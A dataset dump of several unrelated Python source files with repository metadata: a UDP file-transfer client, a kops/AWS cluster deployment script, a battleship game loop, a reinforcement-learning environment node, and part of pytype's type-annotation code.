seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
19483582203 | import socket
import hashlib
"""
data, addr = cli_socket.recvfrom(4096)
print("Server Says")
print(str(data))
cli_socket.close()
"""
cli_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
msg = "Hello"
cli_socket.sendto(msg.encode("utf-8"), ('127.0.0.1', 12345))
data,addr = cli_socket.recvfrom(1024)
numero_conexiones = data.decode('utf-8')
data,addr = cli_socket.recvfrom(1024)
# Se captura el nombre del file desde el servidor
file_name = data
titulo = file_name.decode("utf-8")
f = open("ArchivosRecibidos/"+titulo, 'wb')
# recepción del hash
data,addr = cli_socket.recvfrom(1024)
hexadecimal_hash = data.decode()
def hasheame_esta():
""""This function returns the SHA-1 hash
of the file passed into it"""
# make a hash object
h = hashlib.sha1()
# open file for reading in binary mode
with open("files/"+titulo, 'rb') as file:
# loop till the end of the file
chunk = 0
while chunk != b'':
# read only 1024 bytes at a time
chunk = file.read(1024)
h.update(chunk)
# return the hex representation of digest
return h.hexdigest()
print("Nicole y brayan: el número de sockets que deben crear en esta iteración es " + numero_conexiones)
print(file_name)
print("se recibe el archivo con un hash esperado de " + hexadecimal_hash)
print(numero_conexiones)
data,addr = cli_socket.recvfrom(1024)
corte = titulo + "kill"
termine = corte.encode('utf-8')
print("se recibe el archivo" + titulo)
while data != termine:
f.write(data)
data,addr = cli_socket.recvfrom(1024)
print("archivo recibido")
f.close()
| rodrigo0097/servidorUDP_redes | UDPClient.py | UDPClient.py | py | 1,614 | python | es | code | 0 | github-code | 36 |
2036516482 | import os
import pathlib
import argparse
import uuid
import logging
import subprocess
from nuvoloso.dependencies.install_packages import InstallPackages
from nuvoloso.dependencies.kops_cluster import KopsCluster
from nuvoloso.dependencies.kubectl_helper import KubectlHelper
from nuvoloso.api.nuvo_management import NuvoManagement
DEFAULT_AMI = '099720109477/ubuntu/images/hvm-ssd/ubuntu-bionic-18.04-amd64-server-20190212.1'
DEFAULT_CENTRALD_CLUSTER_NAME = "nuvotestfiomulti.k8s.local"
NUVO_CLUSTER_NAME = "./nuvo_cluster_name.txt"
class CreateAppCluster:
def __init__(self, args):
self.args = args
if not args.create_only:
self.nuvo_mgmt = NuvoManagement(args)
self.kubectl_helper = KubectlHelper(args)
def install_dependencies(self):
InstallPackages.apt_get_update()
InstallPackages.install_kops()
InstallPackages.install_kubectl()
InstallPackages.install_awscli()
InstallPackages.configure_aws(self.args)
InstallPackages.generate_sshkeypair()
return
def set_protection_domains(self, csp_domain_id, nuvo_cluster_name):
accounts = self.nuvo_mgmt.get_all_accounts()
admin_account = self.args.account_name
for account in accounts:
# Creating spa to authorize accounts, so it can set protection domains
self.nuvo_mgmt.do_service_plan_allocation(nuvo_cluster_name, account['name'])
self.nuvo_mgmt.switch_accounts(account['name'])
protection_domain_id = self.nuvo_mgmt.create_protection_domain()
self.nuvo_mgmt.set_protection_domain(protection_domain_id, csp_domain_id)
self.nuvo_mgmt.switch_accounts(admin_account)
def create_application_cluster(self):
self.install_dependencies()
KopsCluster.create_kops_app_cluster(self.args)
if self.args.create_only:
return
try:
csp_domain_id = self.nuvo_mgmt.create_csp_domain()
nuvo_cluster_name = self.nuvo_mgmt.deploy_clusterd(csp_domain_id)
logging.info("Nuvo cluster created : %s", nuvo_cluster_name)
self.set_protection_domains(csp_domain_id, nuvo_cluster_name)
snapshot_catalog_pd = self.nuvo_mgmt.create_protection_domain()
self.nuvo_mgmt.set_snapshot_catalog_policy(snapshot_catalog_pd, csp_domain_id)
except subprocess.CalledProcessError as err:
if err.output: logging.info(err.output)
raise
return nuvo_cluster_name
def main():
"""main"""
default_cluster_name = DEFAULT_CENTRALD_CLUSTER_NAME
default_aws_access_key = default_aws_secret_access_key = default_kops_state_store = None
if os.environ.get('KOPS_CLUSTER_NAME'):
default_cluster_name = os.environ.get('KOPS_CLUSTER_NAME')
if os.environ.get('KOPS_STATE_STORE') is None:
default_kops_state_store = os.environ.get('KOPS_STATE_STORE')
if os.environ.get('AWS_ACCESS_KEY_ID'):
default_aws_access_key = os.environ.get('AWS_ACCESS_KEY_ID')
if os.environ.get('AWS_SECRET_ACCESS_KEY') is None:
default_aws_secret_access_key = os.environ.get('AWS_SECRET_ACCESS_KEY')
parser = argparse.ArgumentParser(description="Deploys a kops cluster with "
"Nuvo data plane and runs fio against all volumes")
parser.add_argument(
'--kops_cluster_name', help='name of kops cluster for Nuvo Data Plane[default: ' +
default_cluster_name + ']',
default=default_cluster_name)
parser.add_argument(
'--nodes', help='number of nodes in the cluster [default=3]', type=int, default=3,
choices=range(1, 101))
parser.add_argument(
'--kops_state_store', help='state store for cluster',
default=default_kops_state_store)
parser.add_argument(
'--aws_access_key', help='aws AccessKey', default=default_aws_access_key)
parser.add_argument(
'--aws_secret_access_key', help='aws SecretAccessKey',
default=default_aws_secret_access_key)
parser.add_argument(
'--region', help='aws region', default=None)
parser.add_argument(
'--k8s_master_zone', help='aws zone for master node',
default=None)
parser.add_argument(
'--k8s_nodes_zone', help='aws zone for other nodes ',
default=None)
parser.add_argument(
'--master_size', help='ec2 instance type for master node ', default=None)
parser.add_argument(
'--node_size', help='ec2 instance type for other nodes ', default=None)
parser.add_argument(
'--nuvo_kontroller_hostname', help='Hostname of https svc of Nuvo Kontroller')
parser.add_argument(
'--log_dirpath', help='log dir to hold test and nuvo logs', default=None)
parser.add_argument(
'--kubernetes_version', help='version of kubernetes to deploy', default='1.14.8')
parser.add_argument(
'--image', help='AMI Image for all instances', default=DEFAULT_AMI)
parser.add_argument(
'--node_volume_size', help='volume size for slave nodes of k8s cluster', type=int,
default=10)
parser.add_argument(
'--master_volume_size', help='volume size for master node of k8s cluster', type=int,
default=20)
parser.add_argument(
'--account_name', help='Nuvoloso account name', default='Demo Tenant')
parser.add_argument(
'--create_only', help='Create cluster only, skip Nuvoloso config', action='store_true')
args = parser.parse_args()
assert(args.kops_cluster_name and args.region and args.kops_state_store and args.aws_access_key
and args.aws_secret_access_key), "Some/all input parameters are not filled. Aborting"
if not args.create_only and args.nuvo_kontroller_hostname == None:
logging.error("Must specify nuvo kontroller hostname")
return
home_dir = pathlib.Path.home()
args.log_dirpath = args.log_dirpath if args.log_dirpath else str(home_dir.joinpath("logs-%s" % str(uuid.uuid4())[:5]))
pathlib.Path(args.log_dirpath).mkdir(parents=True, exist_ok=True)
logging.basicConfig(format='%(asctime)s %(message)s', filename=pathlib.Path(args.log_dirpath).joinpath(
"%s.log" % os.path.basename(__file__)), level=logging.INFO)
print("Script to deploy an application cluster")
test = CreateAppCluster(args)
nuvo_cluster_name = test.create_application_cluster()
if not args.create_only:
with open(NUVO_CLUSTER_NAME, 'w') as fd:
fd.write(nuvo_cluster_name)
logging.info("Application cluster name created: %s", nuvo_cluster_name)
else:
logging.info("Application cluster created: %s", args.kops_cluster_name)
if __name__ == '__main__':
main()
| Nuvoloso/testing_open_source | testingtools/deploy_app_cluster.py | deploy_app_cluster.py | py | 6,776 | python | en | code | 0 | github-code | 36 |
70463664104 | from generators import display_grid, clear
from turn_handler import cpu_turn, player_turn
from file_handlers import save_game, clear_save_data
def game_loop(board_size, player_ships, player_attack, cpu_ships, cpu_attack,
player_ship_count, cpu_ship_count, consecutive_hits, rounds):
"""
Run the main game loop for a game of battleship.
@param board_size: An integer representing the size of the game board.
@type board_size: int
@param player_ships: A list representing the locations of the player's ships on the game board.
@type player_ships: List[List[str, int]]
@param player_attack: A list representing the locations that the player has attack on the game board.
@type player_attack: List[List[str, int]]
@param cpu_ships: A list representing the locations of the CPU's ships on the game board.
@type cpu_ships: List[List[str, int]]
@param cpu_attack: A list representing the locations that the CPU has attack on the game board.
@type cpu_attack: List[List[str, int]]
@param player_ship_count: An integer representing the number of ships remaining for the player.
@type player_ship_count: int
@param cpu_ship_count: An integer representing the number of ships remaining for the CPU.
@type cpu_ship_count: int
@param consecutive_hits: An integer representing the number of consecutive hits made by the player.
@type consecutive_hits: List[List[int, int]]
@param rounds: An integer representing the number of rounds played in the game.
@type rounds: int
"""
options = []
# print the initial game board
game_over = False
# loop until the game is over
while not game_over:
# switch the current player
if rounds % 2 == 1:
current_player = "cpu"
display_grid(cpu_attack)
# handle the CPU's turn
cpu_attack, player_ship_count, consecutive_hits = cpu_turn(player_ships, cpu_attack,
board_size, player_ship_count,
consecutive_hits)
else:
current_player = "player"
# handle the player's turn
display_grid(player_attack)
player_attack, cpu_ship_count = player_turn(cpu_ships, player_attack, board_size, cpu_ship_count)
# print the updated game board
rounds += 1
game_over = (player_ship_count == 0) or (cpu_ship_count == 0)
save_game(player_ships, player_attack, cpu_ships, cpu_attack, consecutive_hits, player_ship_count,
cpu_ship_count, rounds)
clear(3)
# print a message to indicate who won the game
if current_player == "player":
print("You won!")
clear(5)
else:
print("The CPU won :(")
clear(5)
clear_save_data()
| DeeK-Dev/Battleship | game_loop.py | game_loop.py | py | 2,914 | python | en | code | 0 | github-code | 36 |
73969956584 | import numpy as np
from onerl.utils.import_module import get_class_from_str
from onerl.nodes.node import Node
from onerl.utils.shared_array import SharedArray
from onerl.utils.batch.shared import BatchShared
class EnvNode(Node):
@staticmethod
def node_preprocess_ns_config(node_class: str, num: int, ns_config: dict):
Node.node_preprocess_ns_config(node_class, num, ns_config)
# create sample env
sample_env = EnvNode.create_env(ns_config)
# obs
ns_config["env"]["obs_shape"] = sample_env.observation_space.shape
ns_config["env"]["obs_dtype"] = sample_env.observation_space.dtype
# act
if hasattr(sample_env.action_space, "n"):
# discrete
ns_config["env"]["act_shape"] = ()
ns_config["env"]["act_dtype"] = np.int64
ns_config["env"]["act_n"] = sample_env.action_space.n
else:
# continuous
ns_config["env"]["act_shape"] = sample_env.action_space.shape
ns_config["env"]["act_dtype"] = sample_env.action_space.dtype
ns_config["env"]["act_max"] = sample_env.action_space.high
assert np.isclose(sample_env.action_space.low, -sample_env.action_space.high).all(), \
"Action range must be symmetric"
# batch
ns_config["env"]["batch"] = {
"obs": (ns_config["env"]["obs_shape"], ns_config["env"]["obs_dtype"]),
"act": (ns_config["env"]["act_shape"], ns_config["env"]["act_dtype"]),
"rew": ((), np.float32),
"done": ((), np.float32)
}
# offline visualization
if hasattr(sample_env, "load_state") and hasattr(sample_env, "save_state"):
sample_vis_state = sample_env.save_state()
ns_config["env"]["vis_state_shape"] = sample_vis_state.shape
ns_config["env"]["vis_state_dtype"] = sample_vis_state.dtype
@staticmethod
def node_create_shared_objects(node_class: str, num: int, ns_config: dict):
objects = Node.node_create_shared_objects(node_class, num, ns_config)
for obj in objects:
# env
obj["obs"] = SharedArray((ns_config["env"]["frame_stack"], *ns_config["env"]["obs_shape"]),
ns_config["env"]["obs_dtype"])
obj["act"] = SharedArray(ns_config["env"]["act_shape"], ns_config["env"]["act_dtype"])
# log to replay
obj["log"] = BatchShared(ns_config["env"]["batch"], init_ready=True)
# offline visualization
if ("vis_state_shape" in ns_config["env"]) and (Node.node_count("VisualizerNode", ns_config) > 0):
obj["vis_state"] = SharedArray(ns_config["env"]["vis_state_shape"], ns_config["env"]["vis_state_dtype"])
return objects
@staticmethod
def create_env(ns_config: dict):
env_config = ns_config["env"]
env_class = get_class_from_str(env_config.get("import", ""), env_config["name"])
env = env_class(**env_config.get("params", {}))
return env
def run(self):
# acquire shared objects
shared_obs = self.objects["obs"].get()
shared_act = self.objects["act"].get()
shared_log = self.objects["log"].get()
shared_vis_state = self.objects["vis_state"].get() if "vis_state" in self.objects else None
# find nodes
node_scheduler = self.find("SchedulerNode")
node_replay_buffer = self.find("ReplayBufferNode")
if node_replay_buffer is None:
self.log("ReplayBufferNode not found, skip storing experience.")
# create and reset env
env = self.create_env(self.ns_config)
obs = env.reset()
tot_reward = 0
while True:
# copy obs to shared mem
self.setstate("copy_obs")
shared_obs[:-1] = shared_obs[1:]
shared_obs[-1] = obs
# request act
self.setstate("wait_act")
self.send(node_scheduler, self.node_name)
self.recv()
# step env
self.setstate("step")
obs_next, rew, done, info = env.step(shared_act)
# ignore time limit induced done
log_done = done and (not info.get("TimeLimit.truncated", False))
tot_reward += rew
# log
if node_replay_buffer is not None:
self.setstate("wait_log")
self.objects["log"].wait_ready()
self.setstate("copy_log")
shared_log.obs[...] = obs
shared_log.act[...] = shared_act
shared_log.rew[...] = rew
shared_log.done[...] = log_done
self.send(node_replay_buffer, self.node_name)
# update obs & reset
obs = obs_next
if done:
self.setstate("reset")
obs = env.reset()
self.log_metric({"{}@episode_reward".format(self.node_ns): tot_reward})
tot_reward = 0
# offline visualization
if shared_vis_state is not None:
shared_vis_state[...] = env.save_state()
| imoneoi/onerl | onerl/nodes/env_node.py | env_node.py | py | 5,191 | python | en | code | 16 | github-code | 36 |
28890288771 | """Constructs related to type annotations."""
import dataclasses
import logging
import typing
from typing import Mapping, Optional, Set, Tuple, Type, Union as _Union
from pytype import datatypes
from pytype.abstract import _base
from pytype.abstract import _classes
from pytype.abstract import _instance_base
from pytype.abstract import abstract_utils
from pytype.abstract import function
from pytype.abstract import mixin
from pytype.pytd import pytd_utils
log = logging.getLogger(__name__)
def _get_container_type_key(container):
try:
return container.get_type_key()
except AttributeError:
return container
class AnnotationClass(_instance_base.SimpleValue, mixin.HasSlots):
"""Base class of annotations that can be parameterized."""
def __init__(self, name, ctx):
super().__init__(name, ctx)
mixin.HasSlots.init_mixin(self)
self.set_native_slot("__getitem__", self.getitem_slot)
def getitem_slot(self, node, slice_var):
"""Custom __getitem__ implementation."""
slice_content = abstract_utils.maybe_extract_tuple(slice_var)
inner, ellipses = self._build_inner(slice_content)
value = self._build_value(node, tuple(inner), ellipses)
return node, value.to_variable(node)
def _build_inner(self, slice_content):
"""Build the list of parameters.
Args:
slice_content: The iterable of variables to extract parameters from.
Returns:
A tuple of a list of parameters and a set of indices at which an ellipsis
was replaced with Any.
"""
inner = []
ellipses = set()
for var in slice_content:
if len(var.bindings) > 1:
self.ctx.errorlog.ambiguous_annotation(self.ctx.vm.frames, var.data)
inner.append(self.ctx.convert.unsolvable)
else:
val = var.bindings[0].data
if val is self.ctx.convert.ellipsis:
# Ellipses are allowed only in special cases, so turn them into Any
# but record the indices so we can check if they're legal.
ellipses.add(len(inner))
inner.append(self.ctx.convert.unsolvable)
else:
inner.append(val)
return inner, ellipses
def _build_value(self, node, inner, ellipses):
raise NotImplementedError(self.__class__.__name__)
def __repr__(self):
return f"AnnotationClass({self.name})"
def _get_class(self):
return self.ctx.convert.type_type
class AnnotationContainer(AnnotationClass):
"""Implementation of X[...] for annotations."""
def __init__(self, name, ctx, base_cls):
super().__init__(name, ctx)
self.base_cls = base_cls
def __repr__(self):
return f"AnnotationContainer({self.name})"
def _sub_annotation(
self, annot: _base.BaseValue, subst: Mapping[str, _base.BaseValue],
seen: Optional[Set[_base.BaseValue]] = None,
) -> _base.BaseValue:
"""Apply type parameter substitutions to an annotation."""
# This is very similar to annotation_utils.sub_one_annotation, but a couple
# differences make it more convenient to maintain two separate methods:
# - subst here is a str->BaseValue mapping rather than str->Variable, and it
# would be wasteful to create variables just to match sub_one_annotation's
# expected input type.
# - subst contains the type to be substituted in, not an instance of it.
# Again, instantiating the type just to later get the type of the instance
# is unnecessary extra work.
if seen is None:
seen = set()
if annot in seen:
return annot.ctx.convert.unsolvable
seen = seen | {annot}
if isinstance(annot, TypeParameter):
if annot.full_name in subst:
return subst[annot.full_name]
else:
return self.ctx.convert.unsolvable
elif isinstance(annot, mixin.NestedAnnotation):
inner_types = [(key, self._sub_annotation(val, subst, seen))
for key, val in annot.get_inner_types()]
return annot.replace(inner_types)
return annot
def _get_value_info(
self, inner, ellipses, allowed_ellipses=frozenset()
) -> Tuple[Tuple[_Union[int, str], ...], Tuple[_base.BaseValue, ...],
Type[_classes.ParameterizedClass]]:
"""Get information about the container's inner values.
Args:
inner: The list of parameters from _build_inner().
ellipses: The set of ellipsis indices from _build_inner().
allowed_ellipses: Optionally, a set of indices at which ellipses are
allowed. If omitted, ellipses are assumed to be never allowed.
Returns:
A tuple of the template, the parameters, and the container class.
"""
if self.base_cls.full_name == "typing.Protocol":
return abstract_utils.build_generic_template(inner, self) + (
_classes.ParameterizedClass,) # pytype: disable=bad-return-type
if isinstance(self.base_cls, _classes.TupleClass):
template = tuple(range(self.base_cls.tuple_length))
elif isinstance(self.base_cls, _classes.CallableClass):
template = tuple(range(self.base_cls.num_args)) + (abstract_utils.RET,)
else:
template = tuple(t.name for t in self.base_cls.template)
self.ctx.errorlog.invalid_ellipses(self.ctx.vm.frames,
ellipses - allowed_ellipses, self.name)
last_index = len(inner) - 1
if last_index and last_index in ellipses and len(inner) > len(template):
# Even if an ellipsis is not allowed at this position, strip it off so
# that we report only one error for something like 'List[int, ...]'
inner = inner[:-1]
if isinstance(self.base_cls, _classes.ParameterizedClass):
# We're dealing with a generic type alias, e.g.:
# X = Dict[T, str]
# def f(x: X[int]): ...
# We construct `inner` using both the new inner values and the ones
# already in X, to end up with a final result of:
# template=(_K, _V)
# inner=(int, str)
new_inner = []
inner_idx = 0
subst = {}
# Note that we ignore any missing or extra values in inner for now; the
# problem will be reported later by _validate_inner.
for k in template:
v = self.base_cls.formal_type_parameters[k]
if v.formal:
params = self.ctx.annotation_utils.get_type_parameters(v)
for param in params:
# If there are too few parameters, we ignore the problem for now;
# it'll be reported when _build_value checks that the lengths of
# template and inner match.
if param.full_name not in subst and inner_idx < len(inner):
subst[param.full_name] = inner[inner_idx]
inner_idx += 1
new_inner.append(self._sub_annotation(v, subst))
else:
new_inner.append(v)
inner = tuple(new_inner)
if isinstance(self.base_cls, _classes.TupleClass):
template += (abstract_utils.T,)
inner += (self.ctx.convert.merge_values(inner),)
elif isinstance(self.base_cls, _classes.CallableClass):
template = template[:-1] + (abstract_utils.ARGS,) + template[-1:]
args = inner[:-1]
inner = args + (self.ctx.convert.merge_values(args),) + inner[-1:]
abstract_class = type(self.base_cls)
else:
abstract_class = _classes.ParameterizedClass
return template, inner, abstract_class
def _validate_inner(self, template, inner, raw_inner):
"""Check that the passed inner values are valid for the given template."""
if (isinstance(self.base_cls, _classes.ParameterizedClass) and
not abstract_utils.is_generic_protocol(self.base_cls)):
# For a generic type alias, we check that the number of typevars in the
# alias matches the number of raw parameters provided.
template_length = raw_template_length = len(
set(self.ctx.annotation_utils.get_type_parameters(self.base_cls)))
inner_length = len(raw_inner)
base_cls = self.base_cls.base_cls
else:
# In all other cases, we check that the final template length and
# parameter count match, after any adjustments like flattening the inner
# argument list in a Callable.
template_length = len(template)
raw_template_length = len(self.base_cls.template)
inner_length = len(inner)
base_cls = self.base_cls
if inner_length != template_length:
if not template:
self.ctx.errorlog.not_indexable(
self.ctx.vm.frames, base_cls.name, generic_warning=True)
else:
# Use the unprocessed values of `template` and `inner` so that the error
# message matches what the user sees.
if isinstance(self.base_cls, _classes.ParameterizedClass):
error_template = None
else:
error_template = (t.name for t in base_cls.template)
self.ctx.errorlog.wrong_annotation_parameter_count(
self.ctx.vm.frames, self.base_cls, raw_inner, raw_template_length,
error_template)
else:
if len(inner) == 1:
val, = inner
# It's a common mistake to index a container class rather than an
# instance (e.g., list[0]).
# We only check the "int" case, since string literals are allowed for
# late annotations.
if (isinstance(val, _instance_base.Instance) and
val.cls == self.ctx.convert.int_type):
# Don't report this error again.
inner = (self.ctx.convert.unsolvable,)
self.ctx.errorlog.not_indexable(self.ctx.vm.frames, self.name)
# Check for a misused Final annotation
if any(isinstance(val, FinalAnnotation) for val in inner):
self.ctx.errorlog.invalid_final_type(self.ctx.vm.frames)
inner = [val.annotation if isinstance(val, FinalAnnotation) else val
for val in inner]
return inner
def _build_value(self, node, inner, ellipses):
if self.base_cls.is_late_annotation():
# A parameterized LateAnnotation should be converted to another
# LateAnnotation to delay evaluation until the first late annotation is
# resolved. We don't want to create a ParameterizedClass immediately
# because (1) ParameterizedClass expects its base_cls to be a
# class_mixin.Class, and (2) we have to postpone error-checking anyway so
# we might as well postpone the entire evaluation.
printed_params = []
added_typing_imports = set()
for i, param in enumerate(inner):
if i in ellipses:
printed_params.append("...")
else:
typ = param.get_instance_type(node)
annot, typing_imports = pytd_utils.MakeTypeAnnotation(typ)
printed_params.append(annot)
added_typing_imports.update(typing_imports)
expr = f"{self.base_cls.expr}[{', '.join(printed_params)}]"
annot = LateAnnotation(expr, self.base_cls.stack, self.ctx,
typing_imports=added_typing_imports)
self.ctx.vm.late_annotations[self.base_cls.expr].append(annot)
return annot
template, processed_inner, abstract_class = self._get_value_info(
inner, ellipses)
if isinstance(self.base_cls, _classes.ParameterizedClass):
base_cls = self.base_cls.base_cls
else:
base_cls = self.base_cls
if base_cls.full_name in ("typing.Generic", "typing.Protocol"):
# Generic is unique in that parameterizing it defines a new template;
# usually, the parameterized class inherits the base class's template.
# Protocol[T, ...] is a shorthand for Protocol, Generic[T, ...].
template_params = [
param.with_scope(base_cls.full_name)
for param in typing.cast(Tuple[TypeParameter, ...], processed_inner)]
else:
template_params = None
processed_inner = self._validate_inner(template, processed_inner, inner)
params = {
name: (processed_inner[i]
if i < len(processed_inner) else self.ctx.convert.unsolvable)
for i, name in enumerate(template)
}
# Check if the concrete types match the type parameters.
if base_cls.template:
processed_params = self.ctx.annotation_utils.convert_class_annotations(
node, params)
for formal_param in base_cls.template:
root_node = self.ctx.root_node
param_value = processed_params[formal_param.name]
if (isinstance(formal_param, TypeParameter) and
not formal_param.is_generic() and
isinstance(param_value, TypeParameter)):
if formal_param.name == param_value.name:
# We don't need to check if a TypeParameter matches itself.
continue
else:
actual = param_value.instantiate(
root_node, container=abstract_utils.DUMMY_CONTAINER)
elif param_value.is_concrete and isinstance(param_value.pyval, str):
expr = param_value.pyval
annot = LateAnnotation(expr, self.ctx.vm.frames, self.ctx)
base = expr.split("[", 1)[0]
self.ctx.vm.late_annotations[base].append(annot)
actual = annot.instantiate(root_node)
else:
actual = param_value.instantiate(root_node)
match_result = self.ctx.matcher(node).compute_one_match(
actual, formal_param)
if not match_result.success:
if isinstance(param_value, TypeParameter):
# bad_matches replaces type parameters in the expected type with
# their concrete values, which is usually what we want. But when the
# actual type is a type parameter, then it's more helpful to show
# the expected type as a type parameter as well.
bad = []
for match in match_result.bad_matches:
expected = dataclasses.replace(match.expected, typ=formal_param)
bad.append(dataclasses.replace(match, expected=expected))
if isinstance(formal_param, TypeParameter):
details = (f"TypeVars {formal_param.name} and {param_value.name} "
"have incompatible bounds or constraints.")
else:
details = None
else:
bad = match_result.bad_matches
details = None
self.ctx.errorlog.bad_concrete_type(
self.ctx.vm.frames, root_node, bad, details)
return self.ctx.convert.unsolvable
try:
return abstract_class(base_cls, params, self.ctx, template_params)
except abstract_utils.GenericTypeError as e:
self.ctx.errorlog.invalid_annotation(self.ctx.vm.frames, e.annot, e.error)
return self.ctx.convert.unsolvable
def call(self, node, func, args, alias_map=None):
return self._call_helper(node, self.base_cls, func, args)
class _TypeVariableInstance(_base.BaseValue):
"""An instance of a type parameter."""
def __init__(self, param, instance, ctx):
super().__init__(param.name, ctx)
self.cls = self.param = param
self.instance = instance
self.scope = param.scope
@property
def full_name(self):
return f"{self.scope}.{self.name}" if self.scope else self.name
def call(self, node, func, args, alias_map=None):
var = self.instance.get_instance_type_parameter(self.name)
if var.bindings:
return function.call_function(self.ctx, node, var, args)
else:
return node, self.ctx.convert.empty.to_variable(self.ctx.root_node)
def __eq__(self, other):
if isinstance(other, type(self)):
return self.param == other.param and self.instance == other.instance
return NotImplemented
def __hash__(self):
return hash((self.param, self.instance))
def __repr__(self):
return f"{self.__class__.__name__}({self.name!r})"
class TypeParameterInstance(_TypeVariableInstance):
"""An instance of a TypeVar type parameter."""
class ParamSpecInstance(_TypeVariableInstance):
"""An instance of a ParamSpec type parameter."""
class _TypeVariable(_base.BaseValue):
"""Parameter of a type."""
formal = True
_INSTANCE_CLASS: Type[_TypeVariableInstance] = None
def __init__(self,
name,
ctx,
constraints=(),
bound=None,
covariant=False,
contravariant=False,
scope=None):
super().__init__(name, ctx)
# TODO(b/217789659): PEP-612 does not mention constraints, but ParamSpecs
# ignore all the extra parameters anyway..
self.constraints = constraints
self.bound = bound
self.covariant = covariant
self.contravariant = contravariant
self.scope = scope
@_base.BaseValue.module.setter
def module(self, module):
super(_TypeVariable, _TypeVariable).module.fset(self, module)
self.scope = module
@property
def full_name(self):
return f"{self.scope}.{self.name}" if self.scope else self.name
def is_generic(self):
return not self.constraints and not self.bound
def copy(self):
return self.__class__(self.name, self.ctx, self.constraints, self.bound,
self.covariant, self.contravariant, self.scope)
def with_scope(self, scope):
res = self.copy()
res.scope = scope
return res
def __eq__(self, other):
if isinstance(other, type(self)):
return (self.name == other.name and
self.constraints == other.constraints and
self.bound == other.bound and
self.covariant == other.covariant and
self.contravariant == other.contravariant and
self.scope == other.scope)
return NotImplemented
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash((self.name, self.constraints, self.bound, self.covariant,
self.contravariant))
def __repr__(self):
return ("{!s}({!r}, constraints={!r}, bound={!r}, module={!r})"
.format(self.__class__.__name__, self.name, self.constraints,
self.bound, self.scope))
def instantiate(self, node, container=None):
var = self.ctx.program.NewVariable()
if container and (not isinstance(container, _instance_base.SimpleValue) or
self.full_name in container.all_template_names):
instance = self._INSTANCE_CLASS(self, container, self.ctx) # pylint: disable=not-callable
return instance.to_variable(node)
else:
for c in self.constraints:
var.PasteVariable(c.instantiate(node, container))
if self.bound:
var.PasteVariable(self.bound.instantiate(node, container))
if not var.bindings:
var.AddBinding(self.ctx.convert.unsolvable, [], node)
return var
def update_official_name(self, name):
if self.name != name:
message = (f"TypeVar({self.name!r}) must be stored as {self.name!r}, "
f"not {name!r}")
self.ctx.errorlog.invalid_typevar(self.ctx.vm.frames, message)
def call(self, node, func, args, alias_map=None):
return node, self.instantiate(node)
class TypeParameter(_TypeVariable):
"""Parameter of a type (typing.TypeVar)."""
_INSTANCE_CLASS = TypeParameterInstance
class ParamSpec(_TypeVariable):
"""Parameter of a callable type (typing.ParamSpec)."""
_INSTANCE_CLASS = ParamSpecInstance
class ParamSpecArgs(_base.BaseValue):
"""ParamSpec.args."""
def __init__(self, paramspec, ctx):
super().__init__(f"{paramspec.name}.args", ctx)
self.paramspec = paramspec
def instantiate(self, node, container=None):
return self.to_variable(node)
class ParamSpecKwargs(_base.BaseValue):
"""ParamSpec.kwargs."""
def __init__(self, paramspec, ctx):
super().__init__(f"{paramspec.name}.kwargs", ctx)
self.paramspec = paramspec
def instantiate(self, node, container=None):
return self.to_variable(node)
class Concatenate(_base.BaseValue):
  """Concatenation of args and ParamSpec."""

  def __init__(self, params, ctx):
    super().__init__("Concatenate", ctx)
    # All but the last parameter are explicit argument types; the last
    # parameter is the ParamSpec being extended.
    self.args = params[:-1]
    self.paramspec = params[-1]

  @property
  def full_name(self):
    # A Concatenate is identified by its underlying ParamSpec.
    return self.paramspec.full_name

  def instantiate(self, node, container=None):
    return self.to_variable(node)

  @property
  def num_args(self):
    # Number of explicit (non-ParamSpec) argument types.
    return len(self.args)

  def get_args(self):
    # Satisfies the same interface as abstract.CallableClass
    return self.args

  def __repr__(self):
    args = ", ".join(list(map(repr, self.args)) + [self.paramspec.name])
    return f"Concatenate[{args}]"
class Union(_base.BaseValue, mixin.NestedAnnotation, mixin.HasSlots):
  """A list of types.

  Used for parameter matching.

  Attributes:
    options: Iterable of instances of BaseValue.
  """

  def __init__(self, options, ctx):
    super().__init__("Union", ctx)
    assert options
    self.options = list(options)
    self.cls = self._get_class()
    # Guards __repr__ against infinite recursion on self-referential unions.
    self._printing = False
    # Caches instantiate() results per (node, container, option) so that
    # recursive unions terminate.
    self._instance_cache = {}
    mixin.NestedAnnotation.init_mixin(self)
    mixin.HasSlots.init_mixin(self)
    self.set_native_slot("__getitem__", self.getitem_slot)

  def __repr__(self):
    if self._printing:  # recursion detected
      printed_contents = "..."
    else:
      self._printing = True
      printed_contents = ", ".join(repr(o) for o in self.options)
      self._printing = False
    return f"{self.name}[{printed_contents}]"

  def __eq__(self, other):
    if isinstance(other, type(self)):
      return self.options == other.options
    return NotImplemented

  def __ne__(self, other):
    return not self == other

  def __hash__(self):
    # Use the names of the parameter values to approximate a hash, to avoid
    # infinite recursion on recursive type annotations.
    return hash(tuple(o.full_name for o in self.options))

  def _unique_parameters(self):
    return [o.to_variable(self.ctx.root_node) for o in self.options]

  def _get_class(self):
    """Return the common class of all options, or unsolvable if they differ."""
    classes = {o.cls for o in self.options}
    if len(classes) > 1:
      return self.ctx.convert.unsolvable
    else:
      return classes.pop()

  def getitem_slot(self, node, slice_var):
    """Custom __getitem__ implementation."""
    slice_content = abstract_utils.maybe_extract_tuple(slice_var)
    params = self.ctx.annotation_utils.get_type_parameters(self)
    num_params = len({x.name for x in params})
    # Check that we are instantiating all the unbound type parameters
    if num_params != len(slice_content):
      self.ctx.errorlog.wrong_annotation_parameter_count(
          self.ctx.vm.frames, self, [v.data[0] for v in slice_content],
          num_params)
      return node, self.ctx.new_unsolvable(node)
    concrete = (
        var.data[0].instantiate(node, container=abstract_utils.DUMMY_CONTAINER)
        for var in slice_content)
    subst = datatypes.AliasingDict()
    for p in params:
      # If the same parameter name appears again (possibly under a different
      # module prefix), alias it instead of consuming a new concrete value.
      for k in subst:
        if k == p.name or k.endswith(f".{p.name}"):
          subst.add_alias(p.full_name, k)
          break
      else:
        subst[p.full_name] = next(concrete)
    new = self.ctx.annotation_utils.sub_one_annotation(node, self, [subst])
